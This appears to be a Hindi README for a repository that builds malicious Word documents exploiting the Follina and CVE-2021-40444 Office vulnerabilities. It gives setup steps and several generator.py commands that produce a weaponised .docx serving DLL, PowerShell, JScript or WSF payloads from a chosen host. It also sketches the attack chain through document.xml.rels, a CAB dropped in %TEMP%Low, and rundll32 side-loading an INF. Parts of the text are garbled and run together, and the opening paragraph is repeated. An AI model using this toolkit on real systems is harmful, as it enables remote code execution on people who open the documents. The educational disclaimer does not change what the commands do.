
यह रिपॉजिटरी Microsoft Office में Follina CVE और CVE-2021-40444 कमजोरियों का शोषण करने के लिए स्क्रिप्ट्स और संसाधनों को शामिल करती है। स्क्रिप्ट्स दुर्भावनापूर्ण दस्तावेज़ फ़ाइलें उत्पन्न करती हैं जो लक्ष्य प्रणाली पर मनमाना कोड निष्पादित कर सकती हैं।
इस रिपॉजिटरी में Microsoft Office में Follina CVE और CVE-2021-40444 कमजोरियों का शोषण करने के लिए स्क्रिप्ट और संसाधन शामिल हैं। स्क्रिप्ट दुर्भावनापूर्ण दस्तावेज़ फ़ाइलें उत्पन्न करती हैं जो लक्षित सिस्टम पर मनमाना कोड निष्पादित कर सकती हैं।
requirements.txt में सूचीबद्ध)Flare VM सेटअप:
labpasswordPython और वर्चुअल वातावरण:
git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
cd CVE-2021-40444
virtualenv पैकेज स्थापित करें:
pip install virtualenv
venv नाम का वर्चुअल वातावरण बनाएं:
python -m virtualenv venv
venv\Scripts\activate.bat
pip install -r requirements.txt
एक्सप्लॉइट उत्पन्न करना:
python generator.py -u http://192.168.197.132 -P test\calc.dll --host
192.168.197.132 को अपने IP पते से बदलें।उत्पन्न दस्तावेज़ तक पहुँचना:
.docx फ़ाइल निम्न निर्देशिका में स्थित होगी:
C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
.docx) खोला जाता है।document.xml.rels में संग्रहीत दुर्भावनापूर्ण HTML की ओर इशारा करता है।%TEMP%Low निर्देशिका में सहेजती है।rundll32 INF फ़ाइल को साइड-लोड करता है।generator.pycab_parser.pyrequirements.txt से Python पैकेज स्थापित करें।python generator.py -u http://127.0.0.1 -P test\calc.dll --host
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और उन सिस्टमों पर कमजोरियों का शोषण न करें जिनके परीक्षण की अनुमति आपके पास नहीं है। इस जानकारी का दुरुपयोग आपराधिक आरोपों का कारण बन सकता है।